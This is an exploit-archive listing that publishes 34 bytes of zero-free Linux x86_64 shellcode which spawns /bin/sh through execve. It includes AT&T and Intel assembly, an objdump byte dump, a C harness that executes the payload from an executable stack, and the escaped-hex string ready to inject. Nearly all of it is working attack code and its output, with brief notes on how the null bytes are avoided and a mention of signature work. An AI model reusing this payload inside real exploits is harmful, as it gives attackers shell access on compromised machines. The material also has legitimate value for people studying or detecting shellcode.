# Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach)
# Date: 2015-09-10
# Exploit Author: Fanda Uchytil
# Version: 1
# Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian)
#
# Reader notes (what this listing demonstrates, for anyone analysing the payload):
#  - The AT&T and Intel versions encode the same instruction sequence; the objdump
#    output below is the byte-level reference (34 bytes) for signature work.
#  - The sequence contains no 0x00 byte: rax is zeroed with xor and 59 is *added*
#    (a `mov $59, %rax` would embed zero bytes in the immediate), and the path is
#    padded to "/bin//sh" so the 8-byte immediate is also zero-free. The string's
#    terminator comes from pushing the already-zeroed rdi first.
#  - The C harness below only works with an executable stack (`-z execstack` or
#    execstack(8)); on the default NX stack the indirect call faults.

AT&T VERSION (for smooth debug)
-------------------------------

.global _start
.text
_start:
# int execve(const char *filename, char *const argv[], char *const envp[]);
        xor     %rax, %rax
        add     $59, %rax               # Linux 64b execve (__NR_execve = 59; xor+add keeps the bytes zero-free)
        xor     %rdi, %rdi
        push    %rdi                    # '\0' for termination of string below
        mov     $0x68732F2f6e69622F, %rdi   # "/bin//sh" (slash padding) -- little-endian bytes 2f 62 69 6e 2f 2f 73 68
        push    %rdi                    # stack now holds "/bin//sh\0"
        lea     (%rsp), %rdi            # rdi = &"/bin//sh" (equivalent to mov %rsp, %rdi)
        xor     %rsi, %rsi              # no shell arguments (argv = NULL)
        xor     %rdx, %rdx              # no env vars (envp = NULL)
        syscall                         # execve(); does not return on success

# Build, run and inspect the AT&T version (objdump output is the byte reference):
$ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt
$ ./shellcode_atnt
$ gdb -q ./shellcode_atnt

Disassembly of section .text:
  4000d4:       48 31 c0                xor    %rax,%rax
  4000d7:       48 83 c0 3b             add    $0x3b,%rax
  4000db:       48 31 ff                xor    %rdi,%rdi
  4000de:       57                      push   %rdi
  4000df:       48 bf 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rdi
  4000e6:       2f 73 68
  4000e9:       57                      push   %rdi
  4000ea:       48 8d 3c 24             lea    (%rsp),%rdi
  4000ee:       48 31 f6                xor    %rsi,%rsi
  4000f1:       48 31 d2                xor    %rdx,%rdx
  4000f4:       0f 05                   syscall

INTEL VERSION
-------------

BITS 64
        xor     rax, rax
        add     rax, 59                 ; __NR_execve; xor+add instead of mov keeps the immediate zero-free
        xor     rdi, rdi
        push    rdi                     ; NUL terminator for the path pushed next
        mov     rdi, 0x68732F2f6e69622F ; "/bin//sh" (double slash pads to 8 zero-free bytes)
        push    rdi
        lea     rdi, [rsp]              ; rdi = pointer to "/bin//sh\0"
        xor     rsi, rsi                ; argv = NULL
        xor     rdx, rdx                ; envp = NULL
        syscall

; Assemble to the raw `shellcode` file consumed by the harness below:
$ nasm shellcode.a

SHELLCODE_TEST.C
----------------

int main(int argc, char **argv)
{
        /* Treat the bytes of argv[1] as a function and call into them.
           argv[] strings live on the process stack, which is why the binary
           must be linked with an executable stack (see the gcc line below).
           There is no argc check: running without an argument calls NULL. */
        int (*f)() = (int(*)()) argv[1];
        return (*f)();
}

# -z execstack marks the stack executable; without it the NX stack stops the call:
$ gcc -o shellcode_test shellcode_test.c -z execstack   # or use `execstack(8)` before command below
$ ./shellcode_test "$(cat shellcode)"

STRING
------

# Escaped-hex form of the same 34 bytes (the `\x` variant below is what printf consumes):
$ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g'
\48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05
$ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")"